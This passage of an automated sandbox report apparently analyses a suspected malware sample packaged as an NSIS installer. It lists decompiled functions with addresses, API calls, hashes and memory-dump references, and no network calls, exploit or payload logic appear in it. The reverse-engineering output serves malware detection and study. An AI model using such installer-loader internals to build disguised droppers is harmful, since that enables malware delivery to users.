                                                                                                                          					_push(_t19);
                                                                                                                          					_push(_t21);
                                                                                                                          					_t19 = CharPrevW();
                                                                                                                          					_t7 =  *_t19;
                                                                                                                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					 *_t19 =  *_t19 & 0x00000000;
                                                                                                                          					if(_t21 < _t19) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					break;
                                                                                                                          				}
                                                                                                                          				return _t7;
                                                                                                                          			}








                                                                                                                          0x004068f1
                                                                                                                          0x004068fa
                                                                                                                          0x00406911
                                                                                                                          0x00406911
                                                                                                                          0x00406918
                                                                                                                          0x00406924
                                                                                                                          0x00406924
                                                                                                                          0x00406927
                                                                                                                          0x0040692a
                                                                                                                          0x0040692f
                                                                                                                          0x00406931
                                                                                                                          0x0040693a
                                                                                                                          0x0040693e
                                                                                                                          0x0040695b
                                                                                                                          0x00406963
                                                                                                                          0x00406963
                                                                                                                          0x00406968
                                                                                                                          0x0040696a
                                                                                                                          0x0040696d
                                                                                                                          0x00406972
                                                                                                                          0x00406973
                                                                                                                          0x00406977
                                                                                                                          0x00406977
                                                                                                                          0x00406978
                                                                                                                          0x0040697f
                                                                                                                          0x00406981
                                                                                                                          0x00406988
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406990
                                                                                                                          0x00406996
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406996
                                                                                                                          0x0040699b

                                                                                                                          APIs
                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75AA3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                                          • CharNextW.USER32(?,00000000,75AA3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                                          • CharPrevW.USER32(?,?,75AA3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 589700163-2977677972
                                                                                                                          • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                                                          • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                                                          • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                                                          • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040302E(intOrPtr _a4) {
                                                                                                                          				short _v132;
                                                                                                                          				long _t6;
                                                                                                                          				struct HWND__* _t7;
                                                                                                                          				struct HWND__* _t15;
                                                                                                                          
                                                                                                                          				if(_a4 != 0) {
                                                                                                                          					_t15 =  *0x420efc; // 0x0
                                                                                                                          					if(_t15 != 0) {
                                                                                                                          						_t15 = DestroyWindow(_t15);
                                                                                                                          					}
                                                                                                                          					 *0x420efc = 0;
                                                                                                                          					return _t15;
                                                                                                                          				}
                                                                                                                          				__eflags =  *0x420efc; // 0x0
                                                                                                                          				if(__eflags != 0) {
                                                                                                                          					return E00406A71(0);
                                                                                                                          				}
                                                                                                                          				_t6 = GetTickCount();
                                                                                                                          				__eflags = _t6 -  *0x42a26c;
                                                                                                                          				if(_t6 >  *0x42a26c) {
                                                                                                                          					__eflags =  *0x42a268;
                                                                                                                          					if( *0x42a268 == 0) {
                                                                                                                          						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                                                                                                                          						 *0x420efc = _t7;
                                                                                                                          						return ShowWindow(_t7, 5);
                                                                                                                          					}
                                                                                                                          					__eflags =  *0x42a314 & 0x00000001;
                                                                                                                          					if(( *0x42a314 & 0x00000001) != 0) {
                                                                                                                          						wsprintfW( &_v132, L"... %d%%", E00403012());
                                                                                                                          						return E004056CA(0,  &_v132);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t6;
                                                                                                                          			}







                                                                                                                          0x0040303d
                                                                                                                          0x0040303f
                                                                                                                          0x00403046
                                                                                                                          0x00403049
                                                                                                                          0x00403049
                                                                                                                          0x0040304f
                                                                                                                          0x00000000
                                                                                                                          0x0040304f
                                                                                                                          0x00403057
                                                                                                                          0x0040305d
                                                                                                                          0x00000000
                                                                                                                          0x00403060
                                                                                                                          0x00403067
                                                                                                                          0x0040306d
                                                                                                                          0x00403073
                                                                                                                          0x00403075
                                                                                                                          0x0040307b
                                                                                                                          0x004030b9
                                                                                                                          0x004030c2
                                                                                                                          0x00000000
                                                                                                                          0x004030c7
                                                                                                                          0x0040307d
                                                                                                                          0x00403084
                                                                                                                          0x00403095
                                                                                                                          0x00000000
                                                                                                                          0x004030a3
                                                                                                                          0x00403084
                                                                                                                          0x004030cf

                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00403049
                                                                                                                          • GetTickCount.KERNEL32 ref: 00403067
                                                                                                                          • wsprintfW.USER32 ref: 00403095
                                                                                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                            • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,004030A8), ref: 00405725
                                                                                                                            • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll), ref: 00405737
                                                                                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                                                            • Part of subcall function 00403012: MulDiv.KERNEL32(000195AE,00000064,00020193), ref: 00403027
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                          • String ID: ... %d%%
                                                                                                                          • API String ID: 722711167-2449383134
                                                                                                                          • Opcode ID: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                                                                                          • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                                                                          • Opcode Fuzzy Hash: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                                                                                          • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                          				long _v8;
                                                                                                                          				signed char _v12;
                                                                                                                          				unsigned int _v16;
                                                                                                                          				void* _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				long _v56;
                                                                                                                          				void* _v60;
                                                                                                                          				long _t15;
                                                                                                                          				unsigned int _t19;
                                                                                                                          				signed int _t25;
                                                                                                                          				struct HWND__* _t28;
                                                                                                                          
                                                                                                                          				_t28 = _a4;
                                                                                                                          				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                                                          				if(_a8 == 0) {
                                                                                                                          					L4:
                                                                                                                          					_v56 = _t15;
                                                                                                                          					_v60 = 4;
                                                                                                                          					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                                                                          					return _v24;
                                                                                                                          				}
                                                                                                                          				_t19 = GetMessagePos();
                                                                                                                          				_v16 = _t19 >> 0x10;
                                                                                                                          				_v20 = _t19;
                                                                                                                          				ScreenToClient(_t28,  &_v20);
                                                                                                                          				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                                                          				if((_v12 & 0x00000066) != 0) {
                                                                                                                          					_t15 = _v8;
                                                                                                                          					goto L4;
                                                                                                                          				}
                                                                                                                          				return _t25 | 0xffffffff;
                                                                                                                          			}














                                                                                                                          0x00404f8d
                                                                                                                          0x00404f9a
                                                                                                                          0x00404fa0
                                                                                                                          0x00404fde
                                                                                                                          0x00404fde
                                                                                                                          0x00404fed
                                                                                                                          0x00404ff4
                                                                                                                          0x00000000
                                                                                                                          0x00404ff6
                                                                                                                          0x00404fa2
                                                                                                                          0x00404fb1
                                                                                                                          0x00404fb9
                                                                                                                          0x00404fbc
                                                                                                                          0x00404fce
                                                                                                                          0x00404fd4
                                                                                                                          0x00404fdb
                                                                                                                          0x00000000
                                                                                                                          0x00404fdb
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                                                          • GetMessagePos.USER32 ref: 00404FA2
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404FBC
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                          • String ID: f
                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                          • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                          • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                                                          • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                          • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                          				short _v132;
                                                                                                                          				void* _t11;
                                                                                                                          				WCHAR* _t19;
                                                                                                                          
                                                                                                                          				if(_a8 == 0x110) {
                                                                                                                          					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                                          					_a8 = 0x113;
                                                                                                                          				}
                                                                                                                          				if(_a8 == 0x113) {
                                                                                                                          					_t11 = E00403012();
                                                                                                                          					_t19 = L"unpacking data: %d%%";
                                                                                                                          					if( *0x42a270 == 0) {
                                                                                                                          						_t19 = L"verifying installer: %d%%";
                                                                                                                          					}
                                                                                                                          					wsprintfW( &_v132, _t19, _t11);
                                                                                                                          					SetWindowTextW(_a4,  &_v132);
                                                                                                                          					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}






                                                                                                                          0x00402fa3
                                                                                                                          0x00402fb1
                                                                                                                          0x00402fb7
                                                                                                                          0x00402fb7
                                                                                                                          0x00402fc5
                                                                                                                          0x00402fc7
                                                                                                                          0x00402fd3
                                                                                                                          0x00402fd8
                                                                                                                          0x00402fda
                                                                                                                          0x00402fda
                                                                                                                          0x00402fe5
                                                                                                                          0x00402ff5
                                                                                                                          0x00403007
                                                                                                                          0x00403007
                                                                                                                          0x0040300f

                                                                                                                          APIs
                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                          • wsprintfW.USER32 ref: 00402FE5
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                          • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                                                          • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                                                                          • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                                                          • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 75%
                                                                                                                          			E71462655() {
                                                                                                                          				intOrPtr _t24;
                                                                                                                          				void* _t26;
                                                                                                                          				intOrPtr _t27;
                                                                                                                          				signed int _t39;
                                                                                                                          				void* _t40;
                                                                                                                          				void* _t43;
                                                                                                                          				intOrPtr _t44;
                                                                                                                          				void* _t45;
                                                                                                                          
                                                                                                                          				_t40 = E714612BB();
                                                                                                                          				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                                                                                          				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                                                                          				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                                                                                          				do {
                                                                                                                          					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                                                                                          					}
                                                                                                                          					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                                                                                          					if(_t39 <= 7) {
                                                                                                                          						switch( *((intOrPtr*)(_t39 * 4 +  &M71462784))) {
                                                                                                                          							case 0:
                                                                                                                          								 *_t40 = 0;
                                                                                                                          								goto L17;
                                                                                                                          							case 1:
                                                                                                                          								__eax =  *__eax;
                                                                                                                          								if(__ecx > __ebx) {
                                                                                                                          									 *(__esp + 0x10) = __ecx;
                                                                                                                          									__ecx =  *(0x7146407c + __edx * 4);
                                                                                                                          									__edx =  *(__esp + 0x10);
                                                                                                                          									__ecx = __ecx * __edx;
                                                                                                                          									asm("sbb edx, edx");
                                                                                                                          									__edx = __edx & __ecx;
                                                                                                                          									__eax = __eax &  *(0x7146409c + __edx * 4);
                                                                                                                          								}
                                                                                                                          								_push(__eax);
                                                                                                                          								goto L15;
                                                                                                                          							case 2:
                                                                                                                          								__eax = E71461510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                                                          								goto L16;
                                                                                                                          							case 3:
                                                                                                                          								__ecx =  *0x7146506c;
                                                                                                                          								__edx = __ecx - 1;
                                                                                                                          								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                                                                                          								__eax =  *0x7146506c;
                                                                                                                          								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                                                                                          								goto L17;
                                                                                                                          							case 4:
                                                                                                                          								__eax = lstrcpynW(__edi,  *__eax,  *0x7146506c);
                                                                                                                          								goto L17;
                                                                                                                          							case 5:
                                                                                                                          								_push( *0x7146506c);
                                                                                                                          								_push(__edi);
                                                                                                                          								_push( *__eax);
                                                                                                                          								__imp__StringFromGUID2();
                                                                                                                          								goto L17;
                                                                                                                          							case 6:
                                                                                                                          								_push( *__esi);
                                                                                                                          								L15:
                                                                                                                          								__eax = wsprintfW(__edi, 0x71465000);
                                                                                                                          								L16:
                                                                                                                          								__esp = __esp + 0xc;
                                                                                                                          								goto L17;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L17:
                                                                                                                          					_t26 =  *(_t43 + 0x14);
                                                                                                                          					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                                                                          						GlobalFree(_t26);
                                                                                                                          					}
                                                                                                                          					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                                                                          					if(_t27 != 0) {
                                                                                                                          						if(_t27 != 0xffffffff) {
                                                                                                                          							if(_t27 > 0) {
                                                                                                                          								E71461381(_t27 - 1, _t40);
                                                                                                                          								goto L26;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							E71461312(_t40);
                                                                                                                          							L26:
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t44 = _t44 - 1;
                                                                                                                          					_t43 = _t43 - 0x20;
                                                                                                                          				} while (_t44 >= 0);
                                                                                                                          				return GlobalFree(_t40);
                                                                                                                          			}











                                                                                                                          0x7146265f
                                                                                                                          0x71462661
                                                                                                                          0x71462665
                                                                                                                          0x71462674
                                                                                                                          0x71462678
                                                                                                                          0x7146267d
                                                                                                                          0x7146267d
                                                                                                                          0x71462685
                                                                                                                          0x7146268c
                                                                                                                          0x71462692
                                                                                                                          0x00000000
                                                                                                                          0x71462699
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x714626a1
                                                                                                                          0x714626a5
                                                                                                                          0x714626a8
                                                                                                                          0x714626ac
                                                                                                                          0x714626b3
                                                                                                                          0x714626b7
                                                                                                                          0x714626bd
                                                                                                                          0x714626bf
                                                                                                                          0x714626c1
                                                                                                                          0x714626c1
                                                                                                                          0x714626c8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x714626d1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x714626d8
                                                                                                                          0x714626de
                                                                                                                          0x714626e8
                                                                                                                          0x714626ee
                                                                                                                          0x714626f3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71462714
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x714626fa
                                                                                                                          0x71462700
                                                                                                                          0x71462701
                                                                                                                          0x71462703
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x7146271c
                                                                                                                          0x7146271e
                                                                                                                          0x71462724
                                                                                                                          0x7146272a
                                                                                                                          0x7146272a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71462692
                                                                                                                          0x7146272d
                                                                                                                          0x7146272d
                                                                                                                          0x71462732
                                                                                                                          0x71462743
                                                                                                                          0x71462743
                                                                                                                          0x71462749
                                                                                                                          0x7146274e
                                                                                                                          0x71462753
                                                                                                                          0x7146275f
                                                                                                                          0x71462764
                                                                                                                          0x00000000
                                                                                                                          0x71462769
                                                                                                                          0x71462755
                                                                                                                          0x71462756
                                                                                                                          0x7146276a
                                                                                                                          0x7146276a
                                                                                                                          0x71462753
                                                                                                                          0x7146276b
                                                                                                                          0x7146276c
                                                                                                                          0x7146276f
                                                                                                                          0x71462783

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 714612BB: GlobalAlloc.KERNEL32(00000040,?,714612DB,?,7146137F,00000019,714611CA,-000000A0), ref: 714612C5
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 71462743
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 71462778
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33069504467.0000000071461000.00000020.00000001.01000000.00000005.sdmp, Offset: 71460000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33069452109.0000000071460000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33069570468.0000000071464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33069617155.0000000071466000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_71460000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1780285237-0
                                                                                                                          • Opcode ID: a8b6e674a64d5d02a6b159a63a0260f89df3ca7f181c4acde857bc9d2b3e5aad
                                                                                                                          • Instruction ID: 178a4ef24c6a47e84ae014fc9dace4b33f022d8753a4e087ad8a83ced082ac19
                                                                                                                          • Opcode Fuzzy Hash: a8b6e674a64d5d02a6b159a63a0260f89df3ca7f181c4acde857bc9d2b3e5aad
                                                                                                                          • Instruction Fuzzy Hash: 6031C4B2608102FFDB178F55C9C4D2A77BEFF8534D724452DF1429B220C739A8059B62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E00402950(void* __ebx, void* __eflags) {
                                                                                                                          				WCHAR* _t26;
                                                                                                                          				void* _t29;
                                                                                                                          				long _t37;
                                                                                                                          				void* _t49;
                                                                                                                          				void* _t52;
                                                                                                                          				void* _t54;
                                                                                                                          				void* _t56;
                                                                                                                          				void* _t59;
                                                                                                                          				void* _t60;
                                                                                                                          				void* _t61;
                                                                                                                          
                                                                                                                          				_t49 = __ebx;
                                                                                                                          				_t52 = 0xfffffd66;
                                                                                                                          				_t26 = E00402DA6(0xfffffff0);
                                                                                                                          				_t55 = _t26;
                                                                                                                          				 *(_t61 - 0x40) = _t26;
                                                                                                                          				if(E00405FAE(_t26) == 0) {
                                                                                                                          					E00402DA6(0xffffffed);
                                                                                                                          				}
                                                                                                                          				E00406133(_t55);
                                                                                                                          				_t29 = E00406158(_t55, 0x40000000, 2);
                                                                                                                          				 *(_t61 + 8) = _t29;
                                                                                                                          				if(_t29 != 0xffffffff) {
                                                                                                                          					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                                                                                          					if( *(_t61 - 0x28) != _t49) {
                                                                                                                          						_t37 =  *0x42a274;
                                                                                                                          						 *(_t61 - 0x44) = _t37;
                                                                                                                          						_t54 = GlobalAlloc(0x40, _t37);
                                                                                                                          						if(_t54 != _t49) {
                                                                                                                          							E004035F8(_t49);
                                                                                                                          							E004035E2(_t54,  *(_t61 - 0x44));
                                                                                                                          							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                                                                                          							 *(_t61 - 0x10) = _t59;
                                                                                                                          							if(_t59 != _t49) {
                                                                                                                          								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                                                                                          								while( *_t59 != _t49) {
                                                                                                                          									_t51 =  *_t59;
                                                                                                                          									_t60 = _t59 + 8;
                                                                                                                          									 *(_t61 - 0x3c) =  *_t59;
                                                                                                                          									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                                                                          									_t59 = _t60 +  *(_t61 - 0x3c);
                                                                                                                          								}
                                                                                                                          								GlobalFree( *(_t61 - 0x10));
                                                                                                                          							}
                                                                                                                          							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                                                                                          							GlobalFree(_t54);
                                                                                                                          							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                                                                                          					CloseHandle( *(_t61 + 8));
                                                                                                                          				}
                                                                                                                          				_t56 = 0xfffffff3;
                                                                                                                          				if(_t52 < _t49) {
                                                                                                                          					_t56 = 0xffffffef;
                                                                                                                          					DeleteFileW( *(_t61 - 0x40));
                                                                                                                          					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                                                                          				}
                                                                                                                          				_push(_t56);
                                                                                                                          				E00401423();
                                                                                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}













                                                                                                                          0x00402950
                                                                                                                          0x00402952
                                                                                                                          0x00402957
                                                                                                                          0x0040295c
                                                                                                                          0x0040295f
                                                                                                                          0x00402969
                                                                                                                          0x0040296d
                                                                                                                          0x0040296d
                                                                                                                          0x00402973
                                                                                                                          0x00402980
                                                                                                                          0x00402988
                                                                                                                          0x0040298b
                                                                                                                          0x00402997
                                                                                                                          0x0040299a
                                                                                                                          0x004029a0
                                                                                                                          0x004029ae
                                                                                                                          0x004029b3
                                                                                                                          0x004029b7
                                                                                                                          0x004029ba
                                                                                                                          0x004029c3
                                                                                                                          0x004029cf
